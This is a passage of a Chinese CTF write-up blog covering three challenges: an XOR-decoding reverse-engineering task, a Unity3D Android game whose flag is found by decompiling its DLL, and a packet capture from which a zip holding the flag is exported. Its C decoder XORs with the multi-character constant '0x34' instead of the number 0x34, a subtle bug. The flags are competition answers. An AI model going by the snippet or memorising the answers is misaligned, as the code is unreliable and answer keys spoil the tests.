<p><img src="http://static.zybuluo.com/Em1or/aan9t5576zg68jzm54m75s4k/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-81.9kB"></p>
<p>根据伪代码可以看出，是将s2的每一个字符与0x34异或。</p>
<p>写一个解密程序。</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
int main(void) {
    int i;
    char a[100];
    char res;
    strcpy(a, &quot;gmwOSPVkVQk@\\QkY[G@kD[CQFRAXk{gkPQVASSQFI&quot;);
    for(i=0; i&lt;=41; i++)
    {
        res = a[i] ^ &apos;0x34&apos;;
        printf(&quot;%c&quot;, res);
    }

    return 0;
}
</code></pre><p>在线运行一下即可得到flag。</p>
<p>flag：SYC{gdb_be_the_most_powerful_OS_debugger}</p>
<p>这里还有一个办法…在400716这个地址下一个断点，在linux的gdb调试时输入一个很长的字符串，然后一直c，flag的字符会慢慢出来。</p>
<p><strong>BtSys</strong></p>
<blockquote>
<p>(╯°□°）╯︵ ┻━┻ <a href="https://pan.baidu.com/s/12Ckx1YyJxqQKR2gc_6dPWA" target="_blank" rel="noopener">https://pan.baidu.com/s/12Ckx1YyJxqQKR2gc_6dPWA</a> 提取码: 1y6v</p>
</blockquote>
<p>下载了之后用模拟器安了app，发现是打僵尸的，然后是发现是unity3d的游戏。</p>
<p>用安卓tools逆了一下dex，看了一下源码（其实也就全局搜一下flag这类字符串），发现找不到。</p>
<p>参考链接：<a href="https://www.jianshu.com/p/2957621f720f" target="_blank" rel="noopener">https://www.jianshu.com/p/2957621f720f</a></p>
<p>文中说unity3d游戏的逻辑思路都在这个Assembly-CSharp.dll中。</p>
<p>直接搜一下player关键字，找到一个名为playerattack的关键字，在GameManager下。</p>
<p>一个函数一个函数的看，最后在OnGui()函数中找到flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/89tbx3qlnkse4148vorj63h3/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-171kB"></p>
<p>flag：SYC{Zombie_Hunter!}</p>
<h2 id="IOT"><a href="#IOT" class="headerlink" title="IOT"></a><strong>IOT</strong></h2><p><strong>无题</strong> </p>
<blockquote>
<p>蒙师傅说这是他抓智能设备的通信的数据包，说不用题目描述了，直接放tip：flag就在数据包里，明显的不能在明显了。所以.。。提交flag的时候，请把flag四个字母改成SYC再提交！<br>题目链接：<a href="https://pan.baidu.com/s/1SJmjEs7WaGaT3S3cgRrxAQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1SJmjEs7WaGaT3S3cgRrxAQ</a> 提取码：ejvo<br>tip：数据包里好像携带着什么文件。在什么类型的包里面呢？怎么导出他们呢？</p>
</blockquote>
<p>既然说是通信数据包，下载之后是pcapng格式的数据包。</p>
<p>用wireshark打开。</p>
<p><img src="http://static.zybuluo.com/Em1or/stefz1j3exzayy8vx82ikw2h/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-146.9kB"></p>
<p>可以看到有一大堆包，又说是智能设备的通信数据包，于是直接过滤掉其他包，只显示HTTP。</p>
<p><img src="http://static.zybuluo.com/Em1or/a511el2ekzxyoqe3qvvzmrm0/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-165.5kB"></p>
<p>看到有个压缩包，我们用wireshark直接将包内的数据导出，参考链接：<a href="http://www.k0rz3n.com/2017/04/17/wireshark/" target="_blank" rel="noopener">http://www.k0rz3n.com/2017/04/17/wireshark/</a></p>
<p>到处压缩包后，看到压缩包内有一个名为flag的文件，打开后即得flag。</p>
<p>flag：flag{4f90b47d-86c0-4b0e-8090-cf2eb05f15bc} （需将flag改为SYC后提交）</p>

  </div>
  <div class="post-footer">
    

    <a href="#top" class="top">Back to Top</a>
  </div>
</article>
<footer>
  &copy; 2018
  <span class="author">
    P1g3
  </span>
</footer>
    </div>
  </body>
</html>